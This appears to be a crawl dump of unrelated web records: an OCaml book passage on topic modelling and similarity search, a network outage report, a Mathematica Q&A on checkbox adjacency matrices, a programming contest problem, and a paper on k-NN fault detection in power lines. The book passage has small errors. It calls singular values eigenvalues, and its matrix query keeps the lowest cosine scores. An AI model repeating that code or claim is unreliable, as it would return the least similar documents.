better way to fill in the document-word matrix is to use the TF-IDF approach for each word in a document.\n\nApparently, this matrix would be quite sparse. Also its row vectors are in a very high dimension. There is surely redundant information here. 
For example, if two documents talk about the same topic(s), then the words they contain will largely overlap. To this end, the SVD is then used to reduce the dimension and redundancy in this matrix.\n\nWe have seen the SVD in the linear algebra chapter. It is widely used for reducing the dimension of information, by rotating and scaling the coordinating system to find suitable dimensions. SVD decomposes a matrix $$A$$ into $$A = USV^T$$. In this specific context of semantic analysis, $$A$$ is the document-word composition. We can think of the $$U$$ as representing the relationship between document and the topics, and $$V^T$$ as the relationship between topics and words.\n\nThe columns of $$U$$ and rows of $$V^T$$ are both orthonormal bases, and the diagonal matrix $$S$$ has eigenvalues along its diagonal, each representing the weight of a group of corresponding bases from $$U$$ and $$V$$. Therefore, we can throw away the bases with less weight, truncating only $$K$$ columns (rows) from each matrix. In that way, we can preserve a large part of the information from the original document-word table by choosing only a small number of topics. This process is shown in fig. 3. Once we have the document-topic table $$U$$ and the topic-word table $$V$$, using the model will be the same as in LDA example.", null, "Figure 3: Applying SVD and then truncating on document-word matrix to retrieve topic model\n\nCompared to LDA, this process is easy to understand and implement. However, SVD is computationally intensive and hard to iterate with new data. The result is decent, but as this blog shows, it may not be as good as LDA in separating out the topic categories.\n\nApplication of topic modelling is wide. For example, it can be used for summarising the large corpus of text data, text categorisation, spam filter, the recommender system, or automatic tagging of articles, etc. It can even be used to effectively discover useful structure in large collection of biological data.\n\n## Search Relevant Documents\n\nTopic models are effective tools for clustering documents based on their similarity or relevance. We can further use this tool to query relevant document given an input one. In this section, we will go through some techniques on how to query models built using the previous topic modelling method.\n\n### Euclidean and Cosine Similarity\n\nIn the previous sections, we see that the topic modelling techniques maps documents to a vector space of topics. We can use different metrics to compare the similarity between two vectors. Two of the commonly used are the Euclidean and Cosine distances. Suppose we have two vectors $$A$$ and $$B$$, both of length of $$n$$. Then the Euclidean distance between these two are:\n\n$\\sqrt{\\sum_{i=1}^n~(a_i - b_i)^2}.\\qquad(2)$\n\nThe cosine similarity between two vectors $$A$$ and $$B$$ is defined as:\n\n$cos(\\theta) = \\frac{A.B}{\\|A\\|~\\|B\\|}.\\qquad(3)$\n\nIt is the dot product of two vectors divided by the product of the length of both vectors.", null, "Figure 4: Euclidean distance and cosine similarity in a two dimensional space\n\nWe have implemented both methods in the Nlp.Similarity module as similarity metrics for use in NLP. The relationship between the Euclidean distance and Cosine similarity can be expressed in fig. 4. There are two points on this two dimensional space. The Euclidean measures the direct distance of these two points, while the cosine similarity is about the degree between these two vectors. 
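Both metrics take only a few lines to implement; here is a minimal sketch on plain float arrays, written directly against eq. 2 and eq. 3 rather than using the Nlp.Similarity module (it assumes the two arrays have the same length and are not all zeros):\n\nlet euclidean_distance a b =\nlet s = ref 0. in\nArray.iteri (fun i x -> s := !s +. ((x -. b.(i)) *. (x -. b.(i)))) a;\nsqrt !s\n\nlet cosine_similarity a b =\nlet dot = ref 0. in\nlet na = ref 0. in\nlet nb = ref 0. in\nArray.iteri\n(fun i x ->\ndot := !dot +. (x *. b.(i));\nna := !na +. (x *. x);\nnb := !nb +. (b.(i) *. b.(i)))\na;\n!dot /. (sqrt !na *. sqrt !nb)\n\nDividing by the two norms in the last line is what makes the cosine measure insensitive to the scale of the vectors. 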
Therefore, the cosine similarity is more suitable for cases where the magnitude of the vectors does not matter. For example, in topic modelling, we already have two vectors representing documents. If we multiply all the elements in one of them by a scalar 10, the Euclidean distance between these two would change greatly. However, since the probability distribution in the vector does not change, we don’t expect the similarity between these two vectors to change. That’s why in this case we would prefer to use the cosine similarity as a measurement.\n\n### Linear Searching\n\nSuppose we have $$n$$ documents, each represented by a vector of length $$m$$. They are then denoted with variable corpus, an array of arrays, each of which is a document. We provide a vector doc as the query to search for the top-$$k$$ similar documents to it. First, we need a function to calculate pairwise distance for the whole model, and returns result in the form of array of (id, dist). Here id is the original index of the document. dist is the distance between a document in corpus and the query document.\n\nlet all_pairwise_distance typ corpus x =\nlet dist_fun = Owl_nlp_similarity.distance typ in\nlet l = Array.mapi (fun i y -> i, dist_fun x y) corpus in\nArray.sort (fun a b -> Stdlib.compare (snd a) (snd b)) l;\nl\n\nThe results are sorted according to the distance, whichever distance metric we use. Based on this routine we can find the $$k$$ most relevant document:\n\nlet query corpus doc k =\nlet typ = Owl_nlp_similarity.Cosine in\nlet l = all_pairwise_distance typ corpus doc in\nArray.sub l 0 k\n\nHere we use the cosine similarity as measurement of distance between vectors. To improve the efficiency of computation, we can instead using matrix multiplication to implement the cosine similarity. Specifically, suppose we have the query document vector $$A$$, and the corpus of document vector as before, and this array of arrays has already been converted to a dense matrix $$B$$, where each row vector represents a document. Then we can compute the $$AB^T$$ to get the cosine similarity efficiently. Of course, according to eq. 3, we also need to make sure that $$A$$ and each row $$r$$ in $$B$$ are normalised by its own L2-norm before computations, so that for any vector $$v$$ we can have $$\\|v\\| = 1$$.\n\nlet query corpus doc k =\nlet vec = Mat.transpose doc in\nlet l = Mat.(corpus *@ vec) in\nMat.bottom l k\n\nCompared to the previous direct element-by-element multiplication, the matrix dot multiplication is often implemented with highly optimised linear algebra library routines, such as in OpenBLAS. These methods utilise various techniques such as multi-processing and multi-threading so that the performance is much better than a direct pairwise computation according to definition.\n\n## Summary\n\nIn this chapter, we focus on topic modelling, one important natural language processing task, and introduce the basic idea and how Owl support it. First, we introduce how to tokenise text corpus for further mathematical processing. Then we introduce the basic idea of the vector space, and two different ways: the Bag of words (BOW), and Term Frequency–Inverse Document Frequency (TF-IDF), to project a document into a vector space as single vector. 
The BOW is straightforward to understand and implement, while the TF-IDF considers how special a word is across the whole text corpus, and therefore usually gives a more accurate representation.\n\nNext, we present two different methods based on the vector representation to retrieve topics from the documents: the Latent Dirichlet Allocation (LDA), and the Latent Semantic Analysis (LSA). The LSA relies on applying the singular value decomposition to a document-word matrix, while the LDA relies on a generative model and iteratively refines the topic model. Once we have the topic model, we can compare the similarity between documents, or search for similar documents in the text corpus, using different measurements of vector distance. The cosine similarity is a common one in text analysis. The computation of the search process can be optimised using matrix multiplication." ]
[ null, "https://ocaml.xyz/book/images/nlp/svd.png", null, "https://ocaml.xyz/book/images/nlp/similarity.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88096815,"math_prob":0.95328605,"size":45586,"snap":"2020-45-2020-50","text_gpt3_token_len":10787,"char_repetition_ratio":0.15144137,"word_repetition_ratio":0.02671206,"special_character_ratio":0.2431887,"punctuation_ratio":0.13039151,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.99061275,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-24T20:32:19Z\",\"WARC-Record-ID\":\"<urn:uuid:62d071bc-640c-4044-9fd2-417ef659172b>\",\"Content-Length\":\"63097\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5a7dee3a-53ca-4837-93d7-361a986ed417>\",\"WARC-Concurrent-To\":\"<urn:uuid:9900e76c-a702-4894-aaf6-679f4e70cb1e>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://ocaml.xyz/book/nlp.html\",\"WARC-Payload-Digest\":\"sha1:ADTJAX7ON4ZPV2CBLUKXFQC3TJQ6XOUP\",\"WARC-Block-Digest\":\"sha1:JZJNRWDP2HDMSR6PYQCUC4E7K7N4KOMH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141177566.10_warc_CC-MAIN-20201124195123-20201124225123-00405.warc.gz\"}"}
https://portal.nordu.net/exportword?pageId=59508012
[ "Date: Thu, 7 Jul 2022 14:14:16 +0000 (GMT) Message-ID: <295320091.593.1657203256692@7a4fc1c8b7d3> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary=\"----=_Part_592_533680678.1657203256692\" ------=_Part_592_533680678.1657203256692 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: file:///C:/exported.html 201607 - Public report\n\n# 201607 - Public report\n\n=20\n\nUnscheduled:\n\n=20\n=20\n• July 12th: Customer performed move to another server room.\n• =20\n• July 7th: Loss of signal between Narvik and Kiruna due to a fiber break=\n• =20\n• July 6th: Link to umu-br2 was down due to a fiber break between Vindeln= and Ume=C3=A5.\n• =20\n• June 30th: Red link in G=C3=B6teborg area was down due to several cuts = along the fiber circuit. The fiber has now been spliced by the local provid= er and all connections are restored.\n• =20\n=20\n\nScheduled:\n\n=20\n=20\n• July 15th: We performed a planned maintenance to switch storage system = for Sunet Adobe Connect.\n• =20\n• July 10th: Fiber maintenance was performed in Sandviken, affecting DU.<= /li>=20\n• July 10th: Fiber supplier performed reconnections due to cable repair, = Sven=C3=A4cker-Mellerud. Affecting WR.\n• =20\n• July 7th: Fiber supplier performed a planned capacity upgrade maintenan= ce near Nyn=C3=A4shamn.\n• =20\n• July 5th: Supplier performed an exchange of previously damaged cable. T= his affected SH red network.\n• =20\n• July 4th: The Sunet Adobe connect system was migrated to new servers an= d the database to a new database setup.\n• =20\n=20\n=20\n=20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20\n\nScope\n\nUnscheduled\n\nScheduled\n\nTotal\n\nHardware\n\n0 pcs\n\n1 pcs 00:54\n\n1 pcs 00:54\n\n3 pcs 9d 19:35\n\n4 pcs 05:31\n\n7 pcs 10d 01:06\n\nNone\n\n1 pcs 05:41\n\n0 pcs\n\n1 pcs 05:41\n\nRouting\n\n0 pcs\n\n0 pcs\n\n0 pcs\n\nSoftware\n\n0 pcs\n\n1 pcs 03:13\n\n1 pcs 03:13\n\n=20\n\n------=_Part_592_533680678.1657203256692--" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82253623,"math_prob":0.4190095,"size":1999,"snap":"2022-27-2022-33","text_gpt3_token_len":707,"char_repetition_ratio":0.1614035,"word_repetition_ratio":0.032786883,"special_character_ratio":0.43071535,"punctuation_ratio":0.14108911,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9863845,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-07T14:14:16Z\",\"WARC-Record-ID\":\"<urn:uuid:e8a4463d-44bd-4584-af9b-219bab8553bc>\",\"Content-Length\":\"9076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:43c07fa0-3a8a-429b-8298-532d4bd045c2>\",\"WARC-Concurrent-To\":\"<urn:uuid:25692ad3-2700-461b-a9eb-efd40f77d46c>\",\"WARC-IP-Address\":\"109.105.110.80\",\"WARC-Target-URI\":\"https://portal.nordu.net/exportword?pageId=59508012\",\"WARC-Payload-Digest\":\"sha1:GTQTWW6P65SYZQQB5KU4O4ANNTOATAZK\",\"WARC-Block-Digest\":\"sha1:T6GP662BCONI5DV6ENBFCUZAUKL3JY2A\",\"WARC-Identified-Payload-Type\":\"message/rfc822\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104692018.96_warc_CC-MAIN-20220707124050-20220707154050-00602.warc.gz\"}"}
https://mathematica.stackexchange.com/questions/114692/dynamically-sized-n-times-n-checkboxes-corresponding-to-a-matrix
[ "Dynamically sized $n\\times n$ checkboxes corresponding to a matrix\n\nI was wondering if it was possible to do to following:\n\n1. have an input field for an integer where you input the $n$\n\n2. have an $n\\times n$ matrix of checkboxes that would correspond to an $n\\times n$ matrix which has 0's where there boxes are not checked and 1's where they are. This would allow me to input the adjacency matrix of a graph into Mathematica in a fairly easy way without having to type it up every time.\n\nEDIT: Something like this code modified for my purposes\n\nManipulate[\nArrayPlot[Take[data, n, n]],\n{{data, RandomInteger[{0, 1}, {20, 20}]}, ControlType -> None},\n{{n, 5}, 1, 20, 1},\nDynamic[\nPanel[Grid[Outer[Checkbox[Dynamic[data[[#1, #2]]], {0, 1}] &, Range[n], Range[n]]]]]]\n\nEDIT: I have the graphing code working properly as shown below but I want to change/add two things. 1) instead of n being a slider I want it to be an input box. 2) I want to implement FindshortestPath function on the graph that is generated with two input boxes for which two vertices you are finding the path between\n\nManipulate[ GraphPlot[Take[data, n, n], VertexLabeling -> True, SelfLoopStyle -> All], {{data, RandomInteger[{0, 0}, {20, 20}]}, ControlType -> None}, {{n, 5}, 1, 10, 1}, Dynamic[Panel[ Grid[Outer[Checkbox[Dynamic[data[[#1, #2]]], {0, 1}] &, Range[n], Range[n]]]]]]\n\nA bit simple minded:\n\nDynamicModule[{n = 3, bs},\nPanel[Column[{Slider[Dynamic[n, {(n = #) &,\n(bs = PadRight[bs, {n, n}]) &}],\n{2, 100, 1}],\nRow[{Dynamic[Grid[Array[Checkbox[Dynamic[bs[[##]]], {0, 1}] &,\n{n, n}]]],\nSpacer, Dynamic[ArrayPlot[bs]]}]}]],\nInitialization :> {bs = ConstantArray[0, {n, n}]}]", null, "You can modify it to use an InputField[] instead for changing the array's size.\n\n• I tried changing your code like this in order for it to treat the matrix as the adjacency matrix for a graph as well as inputfield but ran into some issues. 
DynamicModule[{n = 3, bs}, Panel[Column[{InputField[ Dynamic[n, {(n = #) &, (bs = PadRight[bs, {n, n}]) &}], {2, 20, 1}], Row[{Dynamic[ Grid[Array[Checkbox[Dynamic[bs[[##]]], {0, 1}] &, {n, n}]]], Spacer, Dynamic[GraphPlot[bs]]}]}]], Initialization :> {bs = ConstantArray[0, {n, n}]}] – ayrnee May 9 '16 at 13:44\nManipulate[Row[{ArrayPlot[mat[[;; k, ;; k]], ImageSize -> 300],\nAdjacencyGraph[mat[[;; k, ;; k]], ImageSize -> {300, 300}]}],\n{{mat, ConstantArray[0, {50, 50}]}, None}, {k, 4, None},\nDynamic[Column[{InputField[Dynamic[k, (k = Clip[IntegerPart@#, {2, 20}]) &], Number,\nFieldSize -> {8, 1}],\nPanel[Grid[Outer[Checkbox[Dynamic[mat[[#, #2]]], {0, 1}] &, Range@k, Range@k]]]}]]]", null, "Update:\n\nI want to implement FindShortestPath function on the graph that is generated with two input boxes for which two vertices you are finding the path between\n\nManipulate[Row[{ArrayPlot[mat[[;; k, ;; k]], ImageSize -> 300],\nWith[{ag = AdjacencyGraph[mat[[;; k, ;; k]], ImageSize -> {300, 300},\nVertexLabels -> \"Name\", ImagePadding -> 5]},\nHighlightGraph[ag, PathGraph[FindShortestPath[ag, s, t],\nDirectedEdges -> True]]]}],\n{{mat, ConstantArray[0, {50, 50}]}, None},\n{k, 6, None}, {s, 1, None}, {t, 2, None},\nDynamic[Row[{Column[{Style[\"size\", 14, \"Panel\"],\nInputField[Dynamic[k, (k = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}],\nStyle[\"source/target\", 14, \"Panel\"],\nInputField[Dynamic[s, (s = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}],\nInputField[Dynamic[t, (t = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}]}, Alignment -> Top],\nPanel[Grid[Outer[Checkbox[Dynamic[mat[[#, #2]]], {0, 1}] &, Range@k,\nRange@k]]]}, Spacer]]]", null, "" ]
[ null, "https://i.stack.imgur.com/rwrWG.png", null, "https://i.stack.imgur.com/nG7LV.png", null, "https://i.stack.imgur.com/yKVuT.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83492094,"math_prob":0.9837203,"size":1273,"snap":"2019-43-2019-47","text_gpt3_token_len":365,"char_repetition_ratio":0.09219858,"word_repetition_ratio":0.06,"special_character_ratio":0.31029066,"punctuation_ratio":0.17407407,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968537,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,5,null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-20T22:15:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ce4acc87-faca-4145-830a-32655721ac4b>\",\"Content-Length\":\"148320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:097cf75a-8f1c-45a2-be46-e23bab5cffac>\",\"WARC-Concurrent-To\":\"<urn:uuid:91d54b27-969e-408d-863d-21519811bc14>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://mathematica.stackexchange.com/questions/114692/dynamically-sized-n-times-n-checkboxes-corresponding-to-a-matrix\",\"WARC-Payload-Digest\":\"sha1:LOZCD7KRMEUJQ4J7KPZNWASO4VEOLPFC\",\"WARC-Block-Digest\":\"sha1:OLEJVRJPYSKNWAB5GSBXRPNBHNH2TOB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986726836.64_warc_CC-MAIN-20191020210506-20191020234006-00517.warc.gz\"}"}
http://acm.sdut.edu.cn/onlinejudge2/index.php/Home/Index/problemdetail/pid/3296.html
[ "XiaoXin’s Kingdom\n\nTime Limit: 1000 ms Memory Limit: 65536 KiB\n\nProblem Description\n\nProblem Description:\n\nXiaoXin has a kingdom with the infinite area.\n\nHe has n soldiers guarding the kingdom.\n\nThe i-th soldier stands at the position (xi,yi), and his walking speed is vi.\n\nIf a point can be reached by a soldier, and the time this soldier walking to this point is strictly less than other soldiers, this point is in the charge of this soldier.\n\nFor every soldier, XiaoXin wants to know if the area in the charge of him is infinite.\n\nInput\n\nThere are multiple test cases, terminated by a line \"0\".\n\nFor each test case, the first line contains one integer n(1<=n<=500).\n\nIn following n lines, each line contains three integers xi,yi,vi(0<=|xi|,|yi|,vi<=10^4).\n\nOutput\n\nOutput\n\nFor each case, output \"Case #k: s\", where k is the case number counting from 1, and s is a string consisting of n character. If the area in the charge of the i-th soldier isn\\'t infinite, the i-th character is \"0\", else it\\'s \"1\".\n\n3\n0 0 3\n1 1 2\n2 2 1\n0\n\nCase #1: 100\n\nGLSilence" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88605595,"math_prob":0.70790905,"size":945,"snap":"2019-43-2019-47","text_gpt3_token_len":263,"char_repetition_ratio":0.120085016,"word_repetition_ratio":0.023952097,"special_character_ratio":0.27407408,"punctuation_ratio":0.12903225,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96125257,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T06:32:22Z\",\"WARC-Record-ID\":\"<urn:uuid:5dfa4ea0-597e-423c-a19f-93cc4e62bd5c>\",\"Content-Length\":\"10096\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3b78be3-3306-4fe5-a843-83e3eac85080>\",\"WARC-Concurrent-To\":\"<urn:uuid:996d99a1-5e4d-4528-aa1a-36a79d4e9d2c>\",\"WARC-IP-Address\":\"210.44.176.195\",\"WARC-Target-URI\":\"http://acm.sdut.edu.cn/onlinejudge2/index.php/Home/Index/problemdetail/pid/3296.html\",\"WARC-Payload-Digest\":\"sha1:V6KEYLTEHKJZY6C5YQ2KRXKF2DIOEJ4T\",\"WARC-Block-Digest\":\"sha1:N4O45TWK4VALLFPY7VD57CCD4QAAZHHS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986672723.50_warc_CC-MAIN-20191017045957-20191017073457-00399.warc.gz\"}"}
https://pcmp.springeropen.com/articles/10.1186/s41601-017-0063-z
[ "# k-NN based fault detection and classification methods for power transmission systems\n\n## Abstract\n\nThis paper deals with two new methods, based on k-NN algorithm, for fault detection and classification in distance protection. In these methods, by finding the distance between each sample and its fifth nearest neighbor in a pre-default window, the fault occurrence time and the faulty phases are determined. The maximum value of the distances in case of detection and classification procedures is compared with pre-defined threshold values. The main advantages of these methods are: simplicity, low calculation burden, acceptable accuracy, and speed. The performance of the proposed scheme is tested on a typical system in MATLAB Simulink. Various possible fault types in different fault resistances, fault inception angles, fault locations, short circuit levels, X/R ratios, source load angles are simulated. In addition, the performance of similar six well-known classification techniques is compared with the proposed classification method using plenty of simulation data.\n\n## Introduction\n\nDistance protection is one of the major protections of power systems, utilized for detection, classification, and location of short circuit faults. In the detection stage, any change caused by different normal and abnormal conditions is recognized. Then in the classification stage, the type of faults (Ag, Bg, Cg, ABg, BCg, CAg, AB, BC and CA) is determined.\n\nIn the fault location stage, the distance between the fault and the relay is determined. Due to importance of speed and accuracy of fault detection and classification units, too many investigations have been dedicated to these fields.\n\nWhen a fault occurs in the power system, variables such as current, power, power factor, voltage, impedance, and frequency change. Many detection techniques detect fault occurrence by comparing the post-fault values of these variables with their values during system normal operation. Some of fault detection methods are based on Kalman filter , first derivative method, Fourier transform (FT), and least squares . Some other methods are based on differential equations , travelling waves [3, 4], phasor measurement , discrete wavelet transform , fuzzy logic, genetic algorithm and neural network .\n\nAlso, many efforts have been made in the field of fault classification, which can be broadly categorized in two main groups. First, methods that are based on signatures of the signals and definition of some criteria such as: discrete wavelet transform (DWT) [9,10,11,12,13], Fourier transform (FT), S-transform , adaptive Kalman filtering , sequential components [16, 17], and synchronized voltage and current samples . The second group includes the methods based on artificial intelligence techniques such as: Artificial Neural Networks (ANN) [19,20,21], fuzzy logic [22, 23], Support Vector Machine (SVM) [24,25,26], and decision-tree .\n\nIn this paper, two new methods are presented for detection and classification of faults. A moving window with the length of half cycle of power frequency is considered and the RMS value of the current samples is computed in the window. The RMS value obtained in the last window before fault, in which the fault instant is the last sample, is saved. The current waveforms are divided by the saved RMS value. 
Then, k-NN algorithm is applied to these normalized waveforms and their squares in classification and detection methods, respectively.\n\nIn the detection method, a moving window with the length of half cycle is considered. In the window, besides finding the fifth nearest neighbor for each point of the squared normalized currents, the distance between each point and its corresponding neighbor is found. By comparing the maximum distance in each window with an adaptive threshold, the fault is detected.\n\nThe classification method has a similar trend, but the k-NN algorithm is applied to the instantaneous values of normalized three-phase currents and length of the window is three quarters of a cycle.\n\nVarious scenarios including different fault types, fault inception angles, fault resistances, fault locations, sources phase angles, X/R ratios, and short circuit levels are used to evaluate the performance of the methods in a simulated typical five-bus power system. Also, in order to evaluate the performance of the proposed classification method, it is compared with six other similar methods. The methods are compared in terms of delay time and accuracy using a data set including 450 different cases. Beside the simplicity, the proposed techniques have small calculation burden and high accuracy. Moreover, the methods performance is preserved in different conditions.\n\nThe remainder of this paper is organized as follows: Section 2 presents the under-study power system. In Section 3, basis of k-NN and its application for fault detection as well as an improved fault detection algorithm are presented. In Section 4, the proposed classification algorithm is introduced. The simulation results are presented in Section 5. A comparison between the performance of the proposed method and some other similar methods is presented in Section 6. Finally, the main conclusions are presented in Section 7.\n\n## Simulated power system\n\nA five-bus power system is modeled in MATLAB Simulink. A schematic single line diagram of the under study system is presented in Fig. 1. The modeled system comprises of two generators, four transformers and active and reactive loads connected to buses 4 and 5. Detailed specification of the system components are as follows:\n\n• Generators: Rated line to line voltage is 20 kV, three-phase short-circuit power is 1000 MVA, frequency is 50 Hz, X/R ratio is 10. Also it is assumed that the angles of sources 1 and 2 are 0 and −10 degree, respectively.\n\n• Transformers: Rated power is 600 MVA, voltage ratio is 20/230 kV with delta-star-grounded connection, its primary and secondary impedances are 0.06 + j0.3 Ω and 0.397 + j2.12 Ω.\n\n• Lines: All of line impedances are 0.02 + j0.15 Ω/km. Lines 1–2, 2–3, 3–4, 4–1, and 5–2 are 200, 70, 120, 40, and 50 km, respectively.\n\n• Loads: The active and reactive powers of load 1 are 400 MW and 100 MVAr, respectively. The active and reactive powers of load 2 are 100 MW and 50 MVAr, respectively.\n\nSampling frequency: It is equal to 10 kHz.\n\n## The proposed change detection scheme\n\n### k-Nearest Neighbor algorithm (k-NN)\n\nThe k-NN algorithm is a nonparametric classification method that can achieve high classification accuracy in problems with non-normal and unknown distributions. For a particular sample, k closest points between the data and the sample are found. 
Usually, the Euclidean distance is used, where one point’s components are utilized to compare with the components of another point.\n\nThe basis of k-NN algorithm is a data matrix that consists of N rows and M columns. Parameters N and M are the number of data points and dimension of each data point, respectively. Using the data matrix, a query point is provided and the closest k points are searched within this data matrix that are the closest to this query point.\n\nIn general, the Euclidean distance between the query and the rest of the points in the data matrix is calculated. After this operation, N Euclidean distances which symbolize the distances between the query with each corresponding point in the data set are achieved. Then, the k nearest points to the query can be simply searched by sorting the distances in ascending order and retrieving those k points that have the smallest distance between the data set and query.\n\n### The proposed fault detection algorithm\n\nConsidering fixed sampling frequency, Euclidean distance between each sample and other samples of a considered sliding window varies when a change occurs. In fact, Euclidean distance represents differences between the samples values. k-NN algorithm can derive variation of the Euclidean distance for change detection. In this work, a sliding window with length of half cycle of power frequency is moved on squared normalized current waveform of each phase. Then, k-NN algorithm is applied to the samples of each window and the fifth nearest neighbor for each sample and the distance between them is obtained. Finally, the maximum distance is selected for each phase named Ma,D, Mb,D, and Mc,D. Based on different simulations, it is confirmed that the fifth nearest neighbor gives the best accuracy. In addition to the derived fifth neighbor, the distance between each sample and its corresponding fifth neighbor is derived. Considering sampling frequency 10 kHz, there are 100 samples in each half cycle, result in 100 different distances. Among them, the maximum distance is compared with a certain threshold value to detect fault condition.\n\nIn case of change occurrence, the sample corresponding to the change enters the end of the window. It is observed that after three or four samples, the maximum distance of some or all of the phases exceed the threshold value. By considering an appropriate value for the threshold, it is possible to detect the fault after 0.2 ms to 0.4 ms. In this study, Ith,D = 0.0667 is selected for fault detection threshold. Flowchart of the proposed algorithm for change detection is shown in Fig. 2.\n\nIn Fig. 3, the proposed criterion for some different fault cases is presented. The instants of change occurrence and the relevant detection times, are shown.\n\n## The proposed fault classification scheme\n\nThe general approach for fault classification is the same as detection method. However, in the classification method the k-NN algorithm is implemented in a window applied to normalized current waveforms with length of three quarters of a cycle, called analysis window. The considered k value and length of analysis window are selected based on different simulations to achieve the best accuracy and speed for the classification.\n\nIn Fig. 4, three-phase distances values for some different fault types with negligible resistance and inception instant equal to 0.2002 s are presented. 
In these figures, the fifth nearest neighbor for each sample of the analysis window is shown.\n\nIt is obvious that the distance between each current sample and its fifth neighbor is a suitable criterion for fault classification. By choosing the maximum distance for each phase (Ma,C, Mb,C, and Mc,C) and comparing it with a threshold value, the type of fault can be determined. The values of Ma,C, Mb,C, and Mc,C are obtained exactly as in the detection method, but in a window with the length of three quarters of a cycle. The best threshold value is selected using different simulations.\n\nSome other considerations are taken into account for the classification method, which are as follows:\n\n1. For discrimination between two phase faults (LL) and grounded two phase faults (LL-g), the mean of the three phases’ corresponding current samples in the analysis window is obtained and the maximum mean is utilized as follows:\n\n$$Mi = \max\left(\frac{i_a + i_b + i_c}{3}\right) \quad \text{in the analysis window}$$\n\nIn case of grounded faults (LL-g), Mi > 100 A, while Mi < 1 A for two phase faults (LL). This criterion can discriminate between LL and LL-g with very high accuracy.\n\n2. In order to omit the initial transient behavior of the signal, the first twenty samples of the window are not considered.\n\nThe flowchart of the classification method is presented in Fig. 5. Threshold Ith,C is set to 0.1108.\n\n## Test cases and simulation results\n\n### Case 1: Various fault types\n\nDifferent fault types are applied at the middle of line 1–2 of the power system shown in Fig. 1. The faults are solid and applied at an identical inception instant 0.2002 s. Results including the discrimination criterion (Mi) and the maximum distance of each phase are presented in Table 1. From the results, one can conclude that the proposed method is able to classify different faults using the mentioned rules.\n\nThe results for each group of phase-to-ground, phase-to-phase-to-ground, and phase-to-phase faults are similar. Therefore, hereafter only four types of faults, namely Ag, ABg, AB, and ABC, are considered.\n\n### Case 2: Various inception instants\n\nIn Table 2, the results for different inception instants are presented for the mentioned faults. The inception instant is varied in steps of 3 ms. The faults are again of solid type. The results confirm that the proposed method is able to classify faults at different inception instants.\n\n### Case 3: Various fault resistances\n\nIn Table 3, the results of this case study for fault resistances 10, 30, 50, 70, and 90 Ω are shown. The faults are applied at an identical inception instant 0.2002 s. From the results, it is confirmed that the proposed method has acceptable performance for fault resistances up to 90 Ω. Although the technique can also classify faults with resistances above 90 Ω, the performance may be less than the acceptable value.\n\n### Case 4: Various fault locations\n\nAnother challenge that should be considered for a fault identification technique is the location of the fault along the transmission lines. In this test case, the system is analyzed with a fault applied at 0%, 20%, 40%, 60%, 80%, and 100% of the transmission line 1–2. Results of the four fault types are shown in Table 4. The faults are solid type and applied at an identical inception instant 0.2002 s.\n\nIn addition, several faults for locations more than 100% are simulated. 
The faults are applied at 105%, 110%, and 120% of the transmission line 2–5 at an identical inception instant 0.2002 s. The results are tabulated in Table 5.\n\nFrom the results, it can be concluded that the performance of the proposed method is preserved even for locations more than 100%. It should be mentioned that the performance of the proposed method degrades for locations more than 120%.\n\n### Case 5: Various sources load angles\n\nThe results for various angles, according different inception instant, fault resistances, and fault types verify that proposed method classify the faults in different values of sources load angles. For abbreviation, the results relevant to this case are not presented.\n\n### Case 6: Various X/R ratios\n\nDifferent X/R ratios impact on the performance of the proposed method is also investigated, considering different inception instant, fault resistances, and fault types. From the results, it can be concluded that accuracy of the proposed method is preserved for different values of X/R ratios.\n\n### Case 7: Various short circuit levels\n\nThe performance of the proposed method is also evaluated for various sources short circuit levels. The algorithm also has desirable performance for these cases.\n\n### Case 8: Various load levels\n\nIn Table 6, the results of some simulated cases for no-load and loads with fraction of the nominal value are shown. It should be noted that for each load, different load values are considered in the condition of no-load of the other one. All the faults are applied in the 